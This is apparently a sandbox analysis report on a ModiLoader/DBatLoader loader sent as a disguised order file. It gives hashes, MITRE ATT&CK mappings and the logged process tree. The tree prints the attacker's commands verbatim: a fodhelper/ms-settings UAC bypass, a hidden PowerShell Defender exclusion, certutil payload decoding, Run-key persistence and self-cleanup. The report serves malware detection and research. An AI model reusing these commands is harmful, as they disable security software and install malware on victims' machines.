modiloader | 6793403490af9417bae8ce93069b5ee31bd28ec0e3fea56f00bee38815cb530d

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
07-01-2025 09:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Adline-Order_New Material_Specification_Order_no_MGP8K804 ,pdf.cmd
Size

2.6MB
MD5

e9310ff7859997821cabdb77fa1fc48a
SHA1

14162fb813665c6e33e4e96278f05489f89b7025
SHA256

a5fd7ac848ce34637de12d1925e2ebcad0f5ab7e833b66933e4bcf6791d0ceb6
SHA512

e40686cb59439ca252eefd5363701b37555a9ed59812c7af7833fb566e74cd260f30c7e14d9a41ca632e1642480d473827701937af8c00d9754cd6d3565cb6c9
SSDEEP

24576:W1sg0bAvBbbTatN015Xp34cZY1cPXCn+RCN1DVkOUH01Si8nZhh2R1hIw/pZEGXE:W1svbAvBb7535k001SiMqpXXXcp

Score

10^/10

modiloader discovery persistence trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader Second Stage 61 IoCs

resource	yara_rule
behavioral1/memory/2428-65-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-87-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-88-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-126-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-127-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-124-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-123-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-121-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-119-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-116-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-115-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-113-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-112-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-110-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-107-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-105-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-102-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-99-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-98-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-97-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-94-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-93-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-91-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-161-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-158-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-156-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-153-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-152-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-150-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-147-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-145-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-142-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-89-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-140-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-137-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-135-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-132-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-130-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-128-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-125-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-122-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-120-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-118-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-117-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-114-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-86-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-111-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-109-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-108-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-106-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-104-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-103-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-101-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-100-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-95-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-84-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-83-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-92-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-90-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-85-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2
behavioral1/memory/2428-82-0x00000000032D0000-0x00000000042D0000-memory.dmp	modiloader_stage2

Executes dropped EXE 30 IoCs

pid	Process
2776	alpha.exe
2696	alpha.exe
2664	alpha.exe
2200	CApha.exe
2944	alpha.exe
2816	CApha.exe
2752	alpha.exe
2652	CApha.exe
2540	alpha.exe
2568	xkn.exe
2332	alpha.exe
1896	ger.exe
1460	alpha.exe
1872	phf.exe
2376	alpha.exe
1104	phf.exe
2428	AnyDesk.pif
588	alpha.exe
1144	alpha.exe
2808	alpha.exe
1072	alpha.exe
316	alpha.exe
1628	alpha.exe
532	alpha.exe
1652	alpha.exe
2156	alpha.exe
2240	alpha.exe
2036	alpha.exe
2080	alpha.exe
2716	doxdtthV.pif

Loads dropped DLL 20 IoCs

pid	Process
3028	cmd.exe
3028	cmd.exe
3028	cmd.exe
2664	alpha.exe
3028	cmd.exe
2944	alpha.exe
3028	cmd.exe
2752	alpha.exe
3028	cmd.exe
2540	alpha.exe
2568	xkn.exe
2568	xkn.exe
2568	xkn.exe
2332	alpha.exe
3028	cmd.exe
1460	alpha.exe
3028	cmd.exe
2376	alpha.exe
2428	AnyDesk.pif
2428	AnyDesk.pif

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Vhttdxod = "C:\\Users\\Public\\Vhttdxod.url"	AnyDesk.pif

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	drive.google.com
4	drive.google.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2428 set thread context of 2716	2428	AnyDesk.pif	69

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.pif

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2808	alpha.exe
2576	PING.EXE

Kills process with taskkill 2 IoCs

evasion

pid	Process
1732	taskkill.exe
1708	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionExtension .pif"	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\ms-settings	ger.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2576	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	6	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2428	AnyDesk.pif

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2568	xkn.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2568	xkn.exe
Token: SeDebugPrivilege	1732	taskkill.exe
Token: SeDebugPrivilege	1708	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3028 wrote to memory of 1976	3028	cmd.exe	31
PID 3028 wrote to memory of 1976	3028	cmd.exe	31
PID 3028 wrote to memory of 1976	3028	cmd.exe	31
PID 3028 wrote to memory of 2736	3028	cmd.exe	32
PID 3028 wrote to memory of 2736	3028	cmd.exe	32
PID 3028 wrote to memory of 2736	3028	cmd.exe	32
PID 3028 wrote to memory of 2744	3028	cmd.exe	33
PID 3028 wrote to memory of 2744	3028	cmd.exe	33
PID 3028 wrote to memory of 2744	3028	cmd.exe	33
PID 3028 wrote to memory of 2776	3028	cmd.exe	34
PID 3028 wrote to memory of 2776	3028	cmd.exe	34
PID 3028 wrote to memory of 2776	3028	cmd.exe	34
PID 3028 wrote to memory of 2696	3028	cmd.exe	35
PID 3028 wrote to memory of 2696	3028	cmd.exe	35
PID 3028 wrote to memory of 2696	3028	cmd.exe	35
PID 3028 wrote to memory of 2664	3028	cmd.exe	36
PID 3028 wrote to memory of 2664	3028	cmd.exe	36
PID 3028 wrote to memory of 2664	3028	cmd.exe	36
PID 2664 wrote to memory of 2200	2664	alpha.exe	37
PID 2664 wrote to memory of 2200	2664	alpha.exe	37
PID 2664 wrote to memory of 2200	2664	alpha.exe	37
PID 3028 wrote to memory of 2944	3028	cmd.exe	38
PID 3028 wrote to memory of 2944	3028	cmd.exe	38
PID 3028 wrote to memory of 2944	3028	cmd.exe	38
PID 2944 wrote to memory of 2816	2944	alpha.exe	39
PID 2944 wrote to memory of 2816	2944	alpha.exe	39
PID 2944 wrote to memory of 2816	2944	alpha.exe	39
PID 3028 wrote to memory of 2752	3028	cmd.exe	40
PID 3028 wrote to memory of 2752	3028	cmd.exe	40
PID 3028 wrote to memory of 2752	3028	cmd.exe	40
PID 2752 wrote to memory of 2652	2752	alpha.exe	41
PID 2752 wrote to memory of 2652	2752	alpha.exe	41
PID 2752 wrote to memory of 2652	2752	alpha.exe	41
PID 3028 wrote to memory of 2540	3028	cmd.exe	42
PID 3028 wrote to memory of 2540	3028	cmd.exe	42
PID 3028 wrote to memory of 2540	3028	cmd.exe	42
PID 2540 wrote to memory of 2568	2540	alpha.exe	43
PID 2540 wrote to memory of 2568	2540	alpha.exe	43
PID 2540 wrote to memory of 2568	2540	alpha.exe	43
PID 2568 wrote to memory of 2332	2568	xkn.exe	44
PID 2568 wrote to memory of 2332	2568	xkn.exe	44
PID 2568 wrote to memory of 2332	2568	xkn.exe	44
PID 2332 wrote to memory of 1896	2332	alpha.exe	45
PID 2332 wrote to memory of 1896	2332	alpha.exe	45
PID 2332 wrote to memory of 1896	2332	alpha.exe	45
PID 3028 wrote to memory of 1460	3028	cmd.exe	46
PID 3028 wrote to memory of 1460	3028	cmd.exe	46
PID 3028 wrote to memory of 1460	3028	cmd.exe	46
PID 1460 wrote to memory of 1872	1460	alpha.exe	47
PID 1460 wrote to memory of 1872	1460	alpha.exe	47
PID 1460 wrote to memory of 1872	1460	alpha.exe	47
PID 3028 wrote to memory of 2376	3028	cmd.exe	48
PID 3028 wrote to memory of 2376	3028	cmd.exe	48
PID 3028 wrote to memory of 2376	3028	cmd.exe	48
PID 2376 wrote to memory of 1104	2376	alpha.exe	49
PID 2376 wrote to memory of 1104	2376	alpha.exe	49
PID 2376 wrote to memory of 1104	2376	alpha.exe	49
PID 3028 wrote to memory of 2428	3028	cmd.exe	50
PID 3028 wrote to memory of 2428	3028	cmd.exe	50
PID 3028 wrote to memory of 2428	3028	cmd.exe	50
PID 3028 wrote to memory of 2428	3028	cmd.exe	50
PID 3028 wrote to memory of 588	3028	cmd.exe	51
PID 3028 wrote to memory of 588	3028	cmd.exe	51
PID 3028 wrote to memory of 588	3028	cmd.exe	51

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Adline-Order_New Material_Specification_Order_no_MGP8K804 ,pdf.cmd"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3028
- C:\Windows\System32\esentutl.exe
  C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.exe /o
  2⤵
  PID:1976
- C:\Windows\System32\esentutl.exe
  C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\extrac32.exe /d C:\\Users\\Public\\CApha.exe /o
  2⤵
  PID:2736
- C:\Windows\System32\esentutl.exe
  C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\certutil.exe /d C:\\Users\\Public\\phf.exe /o
  2⤵
  PID:2744
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
  2⤵
  - Executes dropped EXE
  PID:2776
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:2696
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2664
- - C:\Users\Public\CApha.exe
    C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
    3⤵
    - Executes dropped EXE
    PID:2200
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2944
- - C:\Users\Public\CApha.exe
    C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
    3⤵
    - Executes dropped EXE
    PID:2816
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2752
- - C:\Users\Public\CApha.exe
    C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
    3⤵
    - Executes dropped EXE
    PID:2652
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionExtension .pif"' ; "
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2540
- - C:\Users\Public\xkn.exe
    C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionExtension .pif"' ; "
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2568
  - - C:\Users\Public\alpha.exe
      "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionExtension .pif"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2332
    - - C:\Users\Public\ger.exe
        
        C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionExtension .pif"
        5⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1896
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\phf -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Adline-Order_New Material_Specification_Order_no_MGP8K804 ,pdf.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1460
- - C:\Users\Public\phf.exe
    C:\\Users\\Public\\phf -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Adline-Order_New Material_Specification_Order_no_MGP8K804 ,pdf.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
    3⤵
    - Executes dropped EXE
    PID:1872
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\phf -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2376
- - C:\Users\Public\phf.exe
    C:\\Users\\Public\\phf -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
    3⤵
    - Executes dropped EXE
    PID:1104
- C:\Users\Public\Libraries\AnyDesk.pif
  C:\Users\Public\Libraries\AnyDesk.pif
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:2428
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c C:\Users\Public\Libraries\FX.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1644
- - C:\Users\Public\Libraries\doxdtthV.pif
    C:\Users\Public\Libraries\doxdtthV.pif
    3⤵
    - Executes dropped EXE
    PID:2716
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
  2⤵
  - Executes dropped EXE
  PID:588
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM SystemSettings.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1732
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
  2⤵
  - Executes dropped EXE
  PID:1144
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM SystemSettingsAdminFlows.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1708
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 5
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:2808
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2576
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
  2⤵
  - Executes dropped EXE
  PID:1072
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:316
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
  2⤵
  - Executes dropped EXE
  PID:1628
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\per.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:532
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:1652
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CApha.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2156
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2240
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\phf.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2036
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.avi" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\AnyDesk.avi

Filesize
1.9MB

MD5
4c5df8cd0e2a293bf438d1288b28ade2

SHA1
0e92ea51b7b1932dead2301e518574beccf4f6c2

SHA256
46f40dc1d81da0ab9b892b6d7ae93b543f2d22e872aa72a09cf70aea1f8ff1b2

SHA512
ab0bfcf7c98530266b08862c46530b03645937224c947a8f17a801b7c4f4d2db885722aed536f11365a7f4df2c99df04108208fa9fd2ff84cec535488d4e49fa

Download Submit
C:\Users\Public\Libraries\AnyDesk.pif

Filesize
958KB

MD5
8666ee474e2c330ddb37bec62216abd3

SHA1
3b5835f1ed96bfe9ac2b027d433f8c90a1f96416

SHA256
fe6843e766f78bfa46190600722fe39184209adb1b1c6a2533296170e66f9a05

SHA512
b6a4aeeb30685fda1c6f7008ac3cd4e6a6ab171d53e890d88fa3b954eb74dd404c3c490a2413653adb74e139cd936f665e5cfd4340eaba70e24c43bfa06c692e

Download Submit
C:\Users\Public\Libraries\FX.cmd

Filesize
8KB

MD5
60cd0be570decd49e4798554639a05ae

SHA1
bd7bed69d9ab9a20b5263d74921c453f38477bcb

SHA256
ca6a6c849496453990beceef8c192d90908c0c615fa0a1d01bcd464bad6966a5

SHA512
ab3dbdb4ed95a0cb4072b23dd241149f48ecff8a69f16d81648e825d9d81a55954e5dd9bc46d3d7408421df30c901b9ad1385d1e70793fa8d715c86c9e800c57

Download Submit
\Users\Public\CApha.exe

Filesize
61KB

MD5
7b3080bc1b915a7ca29d29e0b29c1a08

SHA1
7dcfbeabb512582a12d10f1c576565a90138351d

SHA256
baa9972f330ca0d701a36f3642d30f9266d03b371bcd246396cc9f24ac7e443f

SHA512
8f7524d11c55a400fa69bb5c05815e5858e135485f8b85eb49ff4deb70b7bb6b702e09a8c7b61b128dd776c9c4061b28e7358af25cc31f0f16aca7168d19df46

Download Submit
\Users\Public\Libraries\doxdtthV.pif

Filesize
171KB

MD5
22331abcc9472cc9dc6f37faf333aa2c

SHA1
2a001c30ba79a19ceaf6a09c3567c70311760aa4

SHA256
bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

SHA512
c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

Download Submit
\Users\Public\alpha.exe

Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
\Users\Public\ger.exe

Filesize
73KB

MD5
9d0b3066fe3d1fd345e86bc7bcced9e4

SHA1
e05984a6671fcfecbc465e613d72d42bda35fd90

SHA256
4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

SHA512
d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

Download Submit
\Users\Public\phf.exe

Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
\Users\Public\xkn.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2428-150-0x00000000032D0000-0x00000000042D0000-memory.dmp

Filesize
16.0MB

Download
memory/2428-137-0x00000000032D0000-0x00000000042D0000-memory.dmp

Filesize
16.0MB

Download
memory/2428-126-0x00000000032D0000-0x00000000042D0000-memory.dmp

Filesize
16.0MB

Download
memory/2428-127-0x00000000032D0000-0x00000000042D0000-memory.dmp

Filesize
16.0MB

Download
memory/2428-124-0x00000000032D0000-0x00000000042D0000-memory.dmp

Filesize
16.0MB

Download
memory/2428-123-0x00000000032D0000-0x00000000042D0000-memory.dmp

Filesize
16.0MB

Download
memory/2428-121-0x00000000032D0000-0x00000000042D0000-memory.dmp

Filesize
16.0MB

Download
memory/2428-119-0x00000000032D0000-0x00000000042D0000-memory.dmp

Filesize
16.0MB

Download
memory/2428-116-0x00000000032D0000-0x00000000042D0000-memory.dmp

Filesize
16.0MB

Download
memory/2428-115-0x00000000032D0000-0x00000000042D0000-memory.dmp

